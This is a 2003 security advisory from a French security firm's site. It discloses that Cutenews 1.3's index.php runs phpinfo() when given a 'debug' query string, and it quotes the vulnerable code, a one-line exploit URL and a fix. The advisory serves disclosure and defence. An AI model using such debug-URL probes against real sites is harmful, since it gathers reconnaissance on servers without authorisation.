Société de Sécurité Informatique - Audit Firewall Appliances
La sécurité informatique - La sécurité des informations

Cutenews 1.3 information disclosure


Overview


Cutenews 1.3 information disclosure
Discovered on 2003, July, 12th
Vendor: CutePHP
Product : Cutenews

Cutenews is a powerful and easy for using news management system that use flat files to store its database. It supports comments and archives, search function, image uploading, backup function, IP banning, flood protection ...
Mainely, the first job a hacker does, is to retreive a maximum of information from the target server. Cutenews can help much in this task.
For more information, I suggest to read phpinfo() et la sécurité by frog-m@n (french document).

Risk


Exploit easiness etoile1etoile1etoile1etoile1etoile1
Vulnerability spreading etoile1etoile1etoile0etoile0etoile0
Impact etoile1etoile0etoile0etoile0etoile0
Risk etoile1etoile1etoile0etoile0etoile0

Details


In the file index.php, a condition can be made to execute the PHP function phpinfo(); Here is the interesting lines :

if($HTTP_SERVER_VARS['QUERY_STRING'] == "debug"){ debug(); }
...
function debug(){
   global $config_version_name, $config_version_id, $config_http_script_dir;
   echo"<center><b>CuteNews Debug Information:</b><hr><br>";
   echo"Script Version/ID:  $config_version_name / $config_version_id<br>";
   echo"\$config_http_script_dir:  $config_http_script_dir<br><BR>";
   echo"<hr>";
   phpinfo();

exit();
}


Exploit


The exploit is really easy : Give the debug argument to the index.php :

http://victim.com/cutenews/index.php?debug

You will get the classical phpinfo page :


Solution


We suggest to delete the following line from your index.php file :

if($HTTP_SERVER_VARS['QUERY_STRING'] == "debug"){ debug(); }

The vendor has been informed.


Discovered by


Arnaud Jacques aka scrap
webmaster@securiteinfo.com

Partagez cet article

Envoyer cet article par Email ! Imprimer cet article ! Exporter cet article en PDF ! Facebook Twitter Google Bookmarks

SecuriteInfo.com est une entreprise française de sécurité informatique. Nous proposons différentes solutions matérielles et prestations de services permettant de sécuriser les données des Systèmes d'Information d'entreprises ou de collectivités. Notre périmètre d'intervention couvre l'intégralité de votre système d'information : Sécurité périmétrique, réseaux, accès distants, VPN, solutions anti-spam et anti-malwares, différents audits réseaux et systèmes, vérification de la politique de sécurité, hébergement sécurisé ...
Facebook SecuriteInfo.com
Twitter de SecuriteInfo.com
Github de SecuriteInfo.com
Calculs scientifiques distribués contre les maladies, équipe SecuriteInfo.com
Profil Virustotal de SecuriteInfo.com
© 2004-2018 - Tous droits réservés - SecuriteInfo.com